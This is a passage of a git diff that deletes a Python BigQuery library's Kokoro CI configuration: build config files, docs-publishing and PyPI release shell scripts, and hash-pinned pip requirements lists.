via google-auth -six==1.17.0 \ - --hash=sha256:4721f391ed90541fddacab5acf947aa0d3dc7d27b2e1e8eda2be8970586c3274 \ - 
--hash=sha256:ff70335d468e7eb6ec65b95b99d3a2836546063f63acc5171de367e834932a81 - # via gcp-docuploader -tomli==2.2.1 \ - --hash=sha256:023aa114dd824ade0100497eb2318602af309e5a55595f76b626d6d9f3b7b0a6 \ - --hash=sha256:02abe224de6ae62c19f090f68da4e27b10af2b93213d36cf44e6e1c5abd19fdd \ - --hash=sha256:286f0ca2ffeeb5b9bd4fcc8d6c330534323ec51b2f52da063b11c502da16f30c \ - --hash=sha256:2d0f2fdd22b02c6d81637a3c95f8cd77f995846af7414c5c4b8d0545afa1bc4b \ - --hash=sha256:33580bccab0338d00994d7f16f4c4ec25b776af3ffaac1ed74e0b3fc95e885a8 \ - --hash=sha256:400e720fe168c0f8521520190686ef8ef033fb19fc493da09779e592861b78c6 \ - --hash=sha256:40741994320b232529c802f8bc86da4e1aa9f413db394617b9a256ae0f9a7f77 \ - --hash=sha256:465af0e0875402f1d226519c9904f37254b3045fc5084697cefb9bdde1ff99ff \ - --hash=sha256:4a8f6e44de52d5e6c657c9fe83b562f5f4256d8ebbfe4ff922c495620a7f6cea \ - --hash=sha256:4e340144ad7ae1533cb897d406382b4b6fede8890a03738ff1683af800d54192 \ - --hash=sha256:678e4fa69e4575eb77d103de3df8a895e1591b48e740211bd1067378c69e8249 \ - --hash=sha256:6972ca9c9cc9f0acaa56a8ca1ff51e7af152a9f87fb64623e31d5c83700080ee \ - --hash=sha256:7fc04e92e1d624a4a63c76474610238576942d6b8950a2d7f908a340494e67e4 \ - --hash=sha256:889f80ef92701b9dbb224e49ec87c645ce5df3fa2cc548664eb8a25e03127a98 \ - --hash=sha256:8d57ca8095a641b8237d5b079147646153d22552f1c637fd3ba7f4b0b29167a8 \ - --hash=sha256:8dd28b3e155b80f4d54beb40a441d366adcfe740969820caf156c019fb5c7ec4 \ - --hash=sha256:9316dc65bed1684c9a98ee68759ceaed29d229e985297003e494aa825ebb0281 \ - --hash=sha256:a198f10c4d1b1375d7687bc25294306e551bf1abfa4eace6650070a5c1ae2744 \ - --hash=sha256:a38aa0308e754b0e3c67e344754dff64999ff9b513e691d0e786265c93583c69 \ - --hash=sha256:a92ef1a44547e894e2a17d24e7557a5e85a9e1d0048b0b5e7541f76c5032cb13 \ - --hash=sha256:ac065718db92ca818f8d6141b5f66369833d4a80a9d74435a268c52bdfa73140 \ - --hash=sha256:b82ebccc8c8a36f2094e969560a1b836758481f3dc360ce9a3277c65f374285e \ - 
--hash=sha256:c954d2250168d28797dd4e3ac5cf812a406cd5a92674ee4c8f123c889786aa8e \ - --hash=sha256:cb55c73c5f4408779d0cf3eef9f762b9c9f147a77de7b258bef0a5628adc85cc \ - --hash=sha256:cd45e1dc79c835ce60f7404ec8119f2eb06d38b1deba146f07ced3bbc44505ff \ - --hash=sha256:d3f5614314d758649ab2ab3a62d4f2004c825922f9e370b29416484086b264ec \ - --hash=sha256:d920f33822747519673ee656a4b6ac33e382eca9d331c87770faa3eef562aeb2 \ - --hash=sha256:db2b95f9de79181805df90bedc5a5ab4c165e6ec3fe99f970d0e302f384ad222 \ - --hash=sha256:e59e304978767a54663af13c07b3d1af22ddee3bb2fb0618ca1593e4f593a106 \ - --hash=sha256:e85e99945e688e32d5a35c1ff38ed0b3f41f43fad8df0bdf79f72b2ba7bc5272 \ - --hash=sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a \ - --hash=sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7 - # via nox -urllib3==2.3.0 \ - --hash=sha256:1cee9ad369867bfdbbb48b7dd50374c0967a0bb7710050facf0dd6911440e3df \ - --hash=sha256:f8c5449b3cf0861679ce7e0503c7b44b5ec981bec0d1d3795a07f1ba96f0204d - # via requests -virtualenv==20.28.1 \ - --hash=sha256:412773c85d4dab0409b83ec36f7a6499e72eaf08c80e81e9576bca61831c71cb \ - --hash=sha256:5d34ab240fdb5d21549b76f9e8ff3af28252f5499fb6d6f031adac4e5a8c5329 - # via nox diff --git a/.kokoro/docs/common.cfg b/.kokoro/docs/common.cfg deleted file mode 100644 index 76ae5f13b..000000000 --- a/.kokoro/docs/common.cfg +++ /dev/null @@ -1,66 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -# Build logs will be here -action { - define_artifacts { - regex: "**/*sponge_log.xml" - } -} - -# Download trampoline resources. -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" - -# Use the trampoline script to run in docker. -build_file: "python-bigquery/.kokoro/trampoline_v2.sh" - -# Configure the docker image for kokoro-trampoline. 
-env_vars: { - key: "TRAMPOLINE_IMAGE" - value: "gcr.io/cloud-devrel-kokoro-resources/python-lib-docs" -} -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/publish-docs.sh" -} - -env_vars: { - key: "STAGING_BUCKET" - value: "docs-staging" -} - -env_vars: { - key: "V2_STAGING_BUCKET" - # Push google cloud library docs to the Cloud RAD bucket `docs-staging-v2` - value: "docs-staging-v2" -} - -# It will upload the docker image after successful builds. -env_vars: { - key: "TRAMPOLINE_IMAGE_UPLOAD" - value: "true" -} - -# It will always build the docker image. -env_vars: { - key: "TRAMPOLINE_DOCKERFILE" - value: ".kokoro/docker/docs/Dockerfile" -} - -# Fetch the token needed for reporting release status to GitHub -before_action { - fetch_keystore { - keystore_resource { - keystore_config_id: 73713 - keyname: "yoshi-automation-github-key" - } - } -} - -before_action { - fetch_keystore { - keystore_resource { - keystore_config_id: 73713 - keyname: "docuploader_service_account" - } - } -} diff --git a/.kokoro/docs/docs-presubmit.cfg b/.kokoro/docs/docs-presubmit.cfg deleted file mode 100644 index 08adb2e28..000000000 --- a/.kokoro/docs/docs-presubmit.cfg +++ /dev/null @@ -1,28 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "STAGING_BUCKET" - value: "gcloud-python-test" -} - -env_vars: { - key: "V2_STAGING_BUCKET" - value: "gcloud-python-test" -} - -# We only upload the image in the main `docs` build. -env_vars: { - key: "TRAMPOLINE_IMAGE_UPLOAD" - value: "false" -} - -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/build.sh" -} - -# Only run this nox session. 
-env_vars: { - key: "NOX_SESSION" - value: "docs docfx" -} diff --git a/.kokoro/docs/docs.cfg b/.kokoro/docs/docs.cfg deleted file mode 100644 index 8f43917d9..000000000 --- a/.kokoro/docs/docs.cfg +++ /dev/null @@ -1 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto \ No newline at end of file diff --git a/.kokoro/publish-docs.sh b/.kokoro/publish-docs.sh deleted file mode 100755 index 4ed4aaf13..000000000 --- a/.kokoro/publish-docs.sh +++ /dev/null @@ -1,58 +0,0 @@ -#!/bin/bash -# Copyright 2024 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# https://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -set -eo pipefail - -# Disable buffering, so that the logs stream through. 
-export PYTHONUNBUFFERED=1 - -export PATH="${HOME}/.local/bin:${PATH}" - -# build docs -nox -s docs - -# create metadata -python3.10 -m docuploader create-metadata \ - --name=$(jq --raw-output '.name // empty' .repo-metadata.json) \ - --version=$(python3.10 setup.py --version) \ - --language=$(jq --raw-output '.language // empty' .repo-metadata.json) \ - --distribution-name=$(python3.10 setup.py --name) \ - --product-page=$(jq --raw-output '.product_documentation // empty' .repo-metadata.json) \ - --github-repository=$(jq --raw-output '.repo // empty' .repo-metadata.json) \ - --issue-tracker=$(jq --raw-output '.issue_tracker // empty' .repo-metadata.json) - -cat docs.metadata - -# upload docs -python3.10 -m docuploader upload docs/_build/html --metadata-file docs.metadata --staging-bucket "${STAGING_BUCKET}" - - -# docfx yaml files -nox -s docfx - -# create metadata. -python3.10 -m docuploader create-metadata \ - --name=$(jq --raw-output '.name // empty' .repo-metadata.json) \ - --version=$(python3.10 setup.py --version) \ - --language=$(jq --raw-output '.language // empty' .repo-metadata.json) \ - --distribution-name=$(python3.10 setup.py --name) \ - --product-page=$(jq --raw-output '.product_documentation // empty' .repo-metadata.json) \ - --github-repository=$(jq --raw-output '.repo // empty' .repo-metadata.json) \ - --issue-tracker=$(jq --raw-output '.issue_tracker // empty' .repo-metadata.json) - -cat docs.metadata - -# upload docs -python3.10 -m docuploader upload docs/_build/html/docfx_yaml --metadata-file docs.metadata --destination-prefix docfx --staging-bucket "${V2_STAGING_BUCKET}" diff --git a/.kokoro/release.sh b/.kokoro/release.sh deleted file mode 100755 index 65deb5ed3..000000000 --- a/.kokoro/release.sh +++ /dev/null @@ -1,29 +0,0 @@ -#!/bin/bash -# Copyright 2024 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. 
-# You may obtain a copy of the License at -# -# https://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -set -eo pipefail - -# Start the releasetool reporter -python3 -m pip install --require-hashes -r github/python-bigquery/.kokoro/requirements.txt -python3 -m releasetool publish-reporter-script > /tmp/publisher-script; source /tmp/publisher-script - -# Disable buffering, so that the logs stream through. -export PYTHONUNBUFFERED=1 - -# Move into the package, build the distribution and upload. -TWINE_PASSWORD=$(cat "${KOKORO_KEYSTORE_DIR}/73713_google-cloud-pypi-token-keystore-3") -cd github/python-bigquery -python3 setup.py sdist bdist_wheel -twine upload --username __token__ --password "${TWINE_PASSWORD}" dist/* diff --git a/.kokoro/release/common.cfg b/.kokoro/release/common.cfg deleted file mode 100644 index 6f57163f5..000000000 --- a/.kokoro/release/common.cfg +++ /dev/null @@ -1,43 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -# Build logs will be here -action { - define_artifacts { - regex: "**/*sponge_log.xml" - } -} - -# Download trampoline resources. -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" - -# Use the trampoline script to run in docker. -build_file: "python-bigquery/.kokoro/trampoline.sh" - -# Configure the docker image for kokoro-trampoline. 
-env_vars: { - key: "TRAMPOLINE_IMAGE" - value: "gcr.io/cloud-devrel-kokoro-resources/python-multi" -} -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/release.sh" -} - -# Fetch PyPI password -before_action { - fetch_keystore { - keystore_resource { - keystore_config_id: 73713 - keyname: "google-cloud-pypi-token-keystore-3" - } - } -} - -# Store the packages we uploaded to PyPI. That way, we have a record of exactly -# what we published, which we can use to generate SBOMs and attestations. -action { - define_artifacts { - regex: "github/python-bigquery/**/*.tar.gz" - strip_prefix: "github/python-bigquery" - } -} diff --git a/.kokoro/release/release.cfg b/.kokoro/release/release.cfg deleted file mode 100644 index 8f43917d9..000000000 --- a/.kokoro/release/release.cfg +++ /dev/null @@ -1 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto \ No newline at end of file diff --git a/.kokoro/requirements.in b/.kokoro/requirements.in deleted file mode 100644 index fff4d9ce0..000000000 --- a/.kokoro/requirements.in +++ /dev/null @@ -1,11 +0,0 @@ -gcp-docuploader -gcp-releasetool>=2 # required for compatibility with cryptography>=42.x -importlib-metadata -typing-extensions -twine -wheel -setuptools -nox>=2022.11.21 # required to remove dependency on py -charset-normalizer<3 -click<8.1.0 -cryptography>=42.0.5 diff --git a/.kokoro/requirements.txt b/.kokoro/requirements.txt deleted file mode 100644 index 6ad95a04a..000000000 --- a/.kokoro/requirements.txt +++ /dev/null @@ -1,513 +0,0 @@ -# -# This file is autogenerated by pip-compile with Python 3.9 -# by the following command: -# -# pip-compile --allow-unsafe --generate-hashes requirements.in -# -argcomplete==3.5.1 \ - --hash=sha256:1a1d148bdaa3e3b93454900163403df41448a248af01b6e849edc5ac08e6c363 \ - --hash=sha256:eb1ee355aa2557bd3d0145de7b06b2a45b0ce461e1e7813f5d066039ab4177b4 - # via nox -attrs==24.2.0 \ - 
--hash=sha256:5cfb1b9148b5b086569baec03f20d7b6bf3bcacc9a42bebf87ffaaca362f6346 \ - --hash=sha256:81921eb96de3191c8258c199618104dd27ac608d9366f5e35d011eae1867ede2 - # via gcp-releasetool -backports-tarfile==1.2.0 \ - --hash=sha256:77e284d754527b01fb1e6fa8a1afe577858ebe4e9dad8919e34c862cb399bc34 \ - --hash=sha256:d75e02c268746e1b8144c278978b6e98e85de6ad16f8e4b0844a154557eca991 - # via jaraco-context -cachetools==5.5.0 \ - --hash=sha256:02134e8439cdc2ffb62023ce1debca2944c3f289d66bb17ead3ab3dede74b292 \ - --hash=sha256:2cc24fb4cbe39633fb7badd9db9ca6295d766d9c2995f245725a46715d050f2a - # via google-auth -certifi==2024.8.30 \ - --hash=sha256:922820b53db7a7257ffbda3f597266d435245903d80737e34f8a45ff3e3230d8 \ - --hash=sha256:bec941d2aa8195e248a60b31ff9f0558284cf01a52591ceda73ea9afffd69fd9 - # via requests -cffi==1.17.1 \ - --hash=sha256:045d61c734659cc045141be4bae381a41d89b741f795af1dd018bfb532fd0df8 \ - --hash=sha256:0984a4925a435b1da406122d4d7968dd861c1385afe3b45ba82b750f229811e2 \ - --hash=sha256:0e2b1fac190ae3ebfe37b979cc1ce69c81f4e4fe5746bb401dca63a9062cdaf1 \ - --hash=sha256:0f048dcf80db46f0098ccac01132761580d28e28bc0f78ae0d58048063317e15 \ - --hash=sha256:1257bdabf294dceb59f5e70c64a3e2f462c30c7ad68092d01bbbfb1c16b1ba36 \ - --hash=sha256:1c39c6016c32bc48dd54561950ebd6836e1670f2ae46128f67cf49e789c52824 \ - --hash=sha256:1d599671f396c4723d016dbddb72fe8e0397082b0a77a4fab8028923bec050e8 \ - --hash=sha256:28b16024becceed8c6dfbc75629e27788d8a3f9030691a1dbf9821a128b22c36 \ - --hash=sha256:2bb1a08b8008b281856e5971307cc386a8e9c5b625ac297e853d36da6efe9c17 \ - --hash=sha256:30c5e0cb5ae493c04c8b42916e52ca38079f1b235c2f8ae5f4527b963c401caf \ - --hash=sha256:31000ec67d4221a71bd3f67df918b1f88f676f1c3b535a7eb473255fdc0b83fc \ - --hash=sha256:386c8bf53c502fff58903061338ce4f4950cbdcb23e2902d86c0f722b786bbe3 \ - --hash=sha256:3edc8d958eb099c634dace3c7e16560ae474aa3803a5df240542b305d14e14ed \ - --hash=sha256:45398b671ac6d70e67da8e4224a065cec6a93541bb7aebe1b198a61b58c7b702 \ - 
--hash=sha256:46bf43160c1a35f7ec506d254e5c890f3c03648a4dbac12d624e4490a7046cd1 \ - --hash=sha256:4ceb10419a9adf4460ea14cfd6bc43d08701f0835e979bf821052f1805850fe8 \ - --hash=sha256:51392eae71afec0d0c8fb1a53b204dbb3bcabcb3c9b807eedf3e1e6ccf2de903 \ - --hash=sha256:5da5719280082ac6bd9aa7becb3938dc9f9cbd57fac7d2871717b1feb0902ab6 \ - --hash=sha256:610faea79c43e44c71e1ec53a554553fa22321b65fae24889706c0a84d4ad86d \ - --hash=sha256:636062ea65bd0195bc012fea9321aca499c0504409f413dc88af450b57ffd03b \ - --hash=sha256:6883e737d7d9e4899a8a695e00ec36bd4e5e4f18fabe0aca0efe0a4b44cdb13e \ - --hash=sha256:6b8b4a92e1c65048ff98cfe1f735ef8f1ceb72e3d5f0c25fdb12087a23da22be \ - --hash=sha256:6f17be4345073b0a7b8ea599688f692ac3ef23ce28e5df79c04de519dbc4912c \ - --hash=sha256:706510fe141c86a69c8ddc029c7910003a17353970cff3b904ff0686a5927683 \ - --hash=sha256:72e72408cad3d5419375fc87d289076ee319835bdfa2caad331e377589aebba9 \ - --hash=sha256:733e99bc2df47476e3848417c5a4540522f234dfd4ef3ab7fafdf555b082ec0c \ - --hash=sha256:7596d6620d3fa590f677e9ee430df2958d2d6d6de2feeae5b20e82c00b76fbf8 \ - --hash=sha256:78122be759c3f8a014ce010908ae03364d00a1f81ab5c7f4a7a5120607ea56e1 \ - --hash=sha256:805b4371bf7197c329fcb3ead37e710d1bca9da5d583f5073b799d5c5bd1eee4 \ - --hash=sha256:85a950a4ac9c359340d5963966e3e0a94a676bd6245a4b55bc43949eee26a655 \ - --hash=sha256:8f2cdc858323644ab277e9bb925ad72ae0e67f69e804f4898c070998d50b1a67 \ - --hash=sha256:9755e4345d1ec879e3849e62222a18c7174d65a6a92d5b346b1863912168b595 \ - --hash=sha256:98e3969bcff97cae1b2def8ba499ea3d6f31ddfdb7635374834cf89a1a08ecf0 \ - --hash=sha256:a08d7e755f8ed21095a310a693525137cfe756ce62d066e53f502a83dc550f65 \ - --hash=sha256:a1ed2dd2972641495a3ec98445e09766f077aee98a1c896dcb4ad0d303628e41 \ - --hash=sha256:a24ed04c8ffd54b0729c07cee15a81d964e6fee0e3d4d342a27b020d22959dc6 \ - --hash=sha256:a45e3c6913c5b87b3ff120dcdc03f6131fa0065027d0ed7ee6190736a74cd401 \ - --hash=sha256:a9b15d491f3ad5d692e11f6b71f7857e7835eb677955c00cc0aefcd0669adaf6 \ - 
--hash=sha256:ad9413ccdeda48c5afdae7e4fa2192157e991ff761e7ab8fdd8926f40b160cc3 \ - --hash=sha256:b2ab587605f4ba0bf81dc0cb08a41bd1c0a5906bd59243d56bad7668a6fc6c16 \ - --hash=sha256:b62ce867176a75d03a665bad002af8e6d54644fad99a3c70905c543130e39d93 \ - --hash=sha256:c03e868a0b3bc35839ba98e74211ed2b05d2119be4e8a0f224fba9384f1fe02e \ - --hash=sha256:c59d6e989d07460165cc5ad3c61f9fd8f1b4796eacbd81cee78957842b834af4 \ - --hash=sha256:c7eac2ef9b63c79431bc4b25f1cd649d7f061a28808cbc6c47b534bd789ef964 \ - --hash=sha256:c9c3d058ebabb74db66e431095118094d06abf53284d9c81f27300d0e0d8bc7c \ - --hash=sha256:ca74b8dbe6e8e8263c0ffd60277de77dcee6c837a3d0881d8c1ead7268c9e576 \ - --hash=sha256:caaf0640ef5f5517f49bc275eca1406b0ffa6aa184892812030f04c2abf589a0 \ - --hash=sha256:cdf5ce3acdfd1661132f2a9c19cac174758dc2352bfe37d98aa7512c6b7178b3 \ - --hash=sha256:d016c76bdd850f3c626af19b0542c9677ba156e4ee4fccfdd7848803533ef662 \ - --hash=sha256:d01b12eeeb4427d3110de311e1774046ad344f5b1a7403101878976ecd7a10f3 \ - --hash=sha256:d63afe322132c194cf832bfec0dc69a99fb9bb6bbd550f161a49e9e855cc78ff \ - --hash=sha256:da95af8214998d77a98cc14e3a3bd00aa191526343078b530ceb0bd710fb48a5 \ - --hash=sha256:dd398dbc6773384a17fe0d3e7eeb8d1a21c2200473ee6806bb5e6a8e62bb73dd \ - --hash=sha256:de2ea4b5833625383e464549fec1bc395c1bdeeb5f25c4a3a82b5a8c756ec22f \ - --hash=sha256:de55b766c7aa2e2a3092c51e0483d700341182f08e67c63630d5b6f200bb28e5 \ - --hash=sha256:df8b1c11f177bc2313ec4b2d46baec87a5f3e71fc8b45dab2ee7cae86d9aba14 \ - --hash=sha256:e03eab0a8677fa80d646b5ddece1cbeaf556c313dcfac435ba11f107ba117b5d \ - --hash=sha256:e221cf152cff04059d011ee126477f0d9588303eb57e88923578ace7baad17f9 \ - --hash=sha256:e31ae45bc2e29f6b2abd0de1cc3b9d5205aa847cafaecb8af1476a609a2f6eb7 \ - --hash=sha256:edae79245293e15384b51f88b00613ba9f7198016a5948b5dddf4917d4d26382 \ - --hash=sha256:f1e22e8c4419538cb197e4dd60acc919d7696e5ef98ee4da4e01d3f8cfa4cc5a \ - --hash=sha256:f3a2b4222ce6b60e2e8b337bb9596923045681d71e5a082783484d845390938e \ - 
--hash=sha256:f6a16c31041f09ead72d69f583767292f750d24913dadacf5756b966aacb3f1a \ - --hash=sha256:f75c7ab1f9e4aca5414ed4d8e5c0e303a34f4421f8a0d47a4d019ceff0ab6af4 \ - --hash=sha256:f79fc4fc25f1c8698ff97788206bb3c2598949bfe0fef03d299eb1b5356ada99 \ - --hash=sha256:f7f5baafcc48261359e14bcd6d9bff6d4b28d9103847c9e136694cb0501aef87 \ - --hash=sha256:fc48c783f9c87e60831201f2cce7f3b2e4846bf4d8728eabe54d60700b318a0b - # via cryptography -charset-normalizer==2.1.1 \ - --hash=sha256:5a3d016c7c547f69d6f81fb0db9449ce888b418b5b9952cc5e6e66843e9dd845 \ - --hash=sha256:83e9a75d1911279afd89352c68b45348559d1fc0506b054b346651b5e7fee29f - # via - # -r requirements.in - # requests -click==8.0.4 \ - --hash=sha256:6a7a62563bbfabfda3a38f3023a1db4a35978c0abd76f6c9605ecd6554d6d9b1 \ - --hash=sha256:8458d7b1287c5fb128c90e23381cf99dcde74beaf6c7ff6384ce84d6fe090adb - # via - # -r requirements.in - # gcp-docuploader - # gcp-releasetool -colorlog==6.8.2 \ - --hash=sha256:3e3e079a41feb5a1b64f978b5ea4f46040a94f11f0e8bbb8261e3dbbeca64d44 \ - --hash=sha256:4dcbb62368e2800cb3c5abd348da7e53f6c362dda502ec27c560b2e58a66bd33 - # via - # gcp-docuploader - # nox -cryptography==44.0.1 \ - --hash=sha256:00918d859aa4e57db8299607086f793fa7813ae2ff5a4637e318a25ef82730f7 \ - --hash=sha256:1e8d181e90a777b63f3f0caa836844a1182f1f265687fac2115fcf245f5fbec3 \ - --hash=sha256:1f9a92144fa0c877117e9748c74501bea842f93d21ee00b0cf922846d9d0b183 \ - --hash=sha256:21377472ca4ada2906bc313168c9dc7b1d7ca417b63c1c3011d0c74b7de9ae69 \ - --hash=sha256:24979e9f2040c953a94bf3c6782e67795a4c260734e5264dceea65c8f4bae64a \ - --hash=sha256:2a46a89ad3e6176223b632056f321bc7de36b9f9b93b2cc1cccf935a3849dc62 \ - --hash=sha256:322eb03ecc62784536bc173f1483e76747aafeb69c8728df48537eb431cd1911 \ - --hash=sha256:436df4f203482f41aad60ed1813811ac4ab102765ecae7a2bbb1dbb66dcff5a7 \ - --hash=sha256:4f422e8c6a28cf8b7f883eb790695d6d45b0c385a2583073f3cec434cc705e1a \ - --hash=sha256:53f23339864b617a3dfc2b0ac8d5c432625c80014c25caac9082314e9de56f41 \ - 
--hash=sha256:5fed5cd6102bb4eb843e3315d2bf25fede494509bddadb81e03a859c1bc17b83 \ - --hash=sha256:610a83540765a8d8ce0f351ce42e26e53e1f774a6efb71eb1b41eb01d01c3d12 \ - --hash=sha256:6c8acf6f3d1f47acb2248ec3ea261171a671f3d9428e34ad0357148d492c7864 \ - --hash=sha256:6f76fdd6fd048576a04c5210d53aa04ca34d2ed63336d4abd306d0cbe298fddf \ - --hash=sha256:72198e2b5925155497a5a3e8c216c7fb3e64c16ccee11f0e7da272fa93b35c4c \ - --hash=sha256:887143b9ff6bad2b7570da75a7fe8bbf5f65276365ac259a5d2d5147a73775f2 \ - --hash=sha256:888fcc3fce0c888785a4876ca55f9f43787f4c5c1cc1e2e0da71ad481ff82c5b \ - --hash=sha256:8e6a85a93d0642bd774460a86513c5d9d80b5c002ca9693e63f6e540f1815ed0 \ - --hash=sha256:94f99f2b943b354a5b6307d7e8d19f5c423a794462bde2bf310c770ba052b1c4 \ - --hash=sha256:9b336599e2cb77b1008cb2ac264b290803ec5e8e89d618a5e978ff5eb6f715d9 \ - --hash=sha256:a2d8a7045e1ab9b9f803f0d9531ead85f90c5f2859e653b61497228b18452008 \ - --hash=sha256:b8272f257cf1cbd3f2e120f14c68bff2b6bdfcc157fafdee84a1b795efd72862 \ - --hash=sha256:bf688f615c29bfe9dfc44312ca470989279f0e94bb9f631f85e3459af8efc009 \ - --hash=sha256:d9c5b9f698a83c8bd71e0f4d3f9f839ef244798e5ffe96febfa9714717db7af7 \ - --hash=sha256:dd7c7e2d71d908dc0f8d2027e1604102140d84b155e658c20e8ad1304317691f \ - --hash=sha256:df978682c1504fc93b3209de21aeabf2375cb1571d4e61907b3e7a2540e83026 \ - --hash=sha256:e403f7f766ded778ecdb790da786b418a9f2394f36e8cc8b796cc056ab05f44f \ - --hash=sha256:eb3889330f2a4a148abead555399ec9a32b13b7c8ba969b72d8e500eb7ef84cd \ - --hash=sha256:f4daefc971c2d1f82f03097dc6f216744a6cd2ac0f04c68fb935ea2ba2a0d420 \ - --hash=sha256:f51f5705ab27898afda1aaa430f34ad90dc117421057782022edf0600bec5f14 \ - --hash=sha256:fd0ee90072861e276b0ff08bd627abec29e32a53b2be44e41dbcdf87cbee2b00 - # via - # -r requirements.in - # gcp-releasetool - # secretstorage -distlib==0.3.9 \ - --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ - --hash=sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403 - # via 
virtualenv -docutils==0.21.2 \ - --hash=sha256:3a6b18732edf182daa3cd12775bbb338cf5691468f91eeeb109deff6ebfa986f \ - --hash=sha256:dafca5b9e384f0e419294eb4d2ff9fa826435bf15f15b7bd45723e8ad76811b2 - # via readme-renderer -filelock==3.16.1 \ - --hash=sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0 \ - --hash=sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435 - # via virtualenv -gcp-docuploader==0.6.5 \ - --hash=sha256:30221d4ac3e5a2b9c69aa52fdbef68cc3f27d0e6d0d90e220fc024584b8d2318 \ - --hash=sha256:b7458ef93f605b9d46a4bf3a8dc1755dad1f31d030c8679edf304e343b347eea - # via -r requirements.in -gcp-releasetool==2.1.1 \ - --hash=sha256:25639269f4eae510094f9dbed9894977e1966933211eb155a451deebc3fc0b30 \ - --hash=sha256:845f4ded3d9bfe8cc7fdaad789e83f4ea014affa77785259a7ddac4b243e099e - # via -r requirements.in -google-api-core==2.21.0 \ - --hash=sha256:4a152fd11a9f774ea606388d423b68aa7e6d6a0ffe4c8266f74979613ec09f81 \ - --hash=sha256:6869eacb2a37720380ba5898312af79a4d30b8bca1548fb4093e0697dc4bdf5d - # via - # google-cloud-core - # google-cloud-storage -google-auth==2.35.0 \ - --hash=sha256:25df55f327ef021de8be50bad0dfd4a916ad0de96da86cd05661c9297723ad3f \ - --hash=sha256:f4c64ed4e01e8e8b646ef34c018f8bf3338df0c8e37d8b3bba40e7f574a3278a - # via - # gcp-releasetool - # google-api-core - # google-cloud-core - # google-cloud-storage -google-cloud-core==2.4.1 \ - --hash=sha256:9b7749272a812bde58fff28868d0c5e2f585b82f37e09a1f6ed2d4d10f134073 \ - --hash=sha256:a9e6a4422b9ac5c29f79a0ede9485473338e2ce78d91f2370c01e730eab22e61 - # via google-cloud-storage -google-cloud-storage==2.18.2 \ - --hash=sha256:97a4d45c368b7d401ed48c4fdfe86e1e1cb96401c9e199e419d289e2c0370166 \ - --hash=sha256:aaf7acd70cdad9f274d29332673fcab98708d0e1f4dceb5a5356aaef06af4d99 - # via gcp-docuploader -google-crc32c==1.6.0 \ - --hash=sha256:05e2d8c9a2f853ff116db9706b4a27350587f341eda835f46db3c0a8c8ce2f24 \ - 
--hash=sha256:18e311c64008f1f1379158158bb3f0c8d72635b9eb4f9545f8cf990c5668e59d \ - --hash=sha256:236c87a46cdf06384f614e9092b82c05f81bd34b80248021f729396a78e55d7e \ - --hash=sha256:35834855408429cecf495cac67ccbab802de269e948e27478b1e47dfb6465e57 \ - --hash=sha256:386122eeaaa76951a8196310432c5b0ef3b53590ef4c317ec7588ec554fec5d2 \ - --hash=sha256:40b05ab32a5067525670880eb5d169529089a26fe35dce8891127aeddc1950e8 \ - --hash=sha256:48abd62ca76a2cbe034542ed1b6aee851b6f28aaca4e6551b5599b6f3ef175cc \ - --hash=sha256:50cf2a96da226dcbff8671233ecf37bf6e95de98b2a2ebadbfdf455e6d05df42 \ - --hash=sha256:51c4f54dd8c6dfeb58d1df5e4f7f97df8abf17a36626a217f169893d1d7f3e9f \ - --hash=sha256:5bcc90b34df28a4b38653c36bb5ada35671ad105c99cfe915fb5bed7ad6924aa \ - --hash=sha256:62f6d4a29fea082ac4a3c9be5e415218255cf11684ac6ef5488eea0c9132689b \ - --hash=sha256:6eceb6ad197656a1ff49ebfbbfa870678c75be4344feb35ac1edf694309413dc \ - --hash=sha256:7aec8e88a3583515f9e0957fe4f5f6d8d4997e36d0f61624e70469771584c760 \ - --hash=sha256:91ca8145b060679ec9176e6de4f89b07363d6805bd4760631ef254905503598d \ - --hash=sha256:a184243544811e4a50d345838a883733461e67578959ac59964e43cca2c791e7 \ - --hash=sha256:a9e4b426c3702f3cd23b933436487eb34e01e00327fac20c9aebb68ccf34117d \ - --hash=sha256:bb0966e1c50d0ef5bc743312cc730b533491d60585a9a08f897274e57c3f70e0 \ - --hash=sha256:bb8b3c75bd157010459b15222c3fd30577042a7060e29d42dabce449c087f2b3 \ - --hash=sha256:bd5e7d2445d1a958c266bfa5d04c39932dc54093fa391736dbfdb0f1929c1fb3 \ - --hash=sha256:c87d98c7c4a69066fd31701c4e10d178a648c2cac3452e62c6b24dc51f9fcc00 \ - --hash=sha256:d2952396dc604544ea7476b33fe87faedc24d666fb0c2d5ac971a2b9576ab871 \ - --hash=sha256:d8797406499f28b5ef791f339594b0b5fdedf54e203b5066675c406ba69d705c \ - 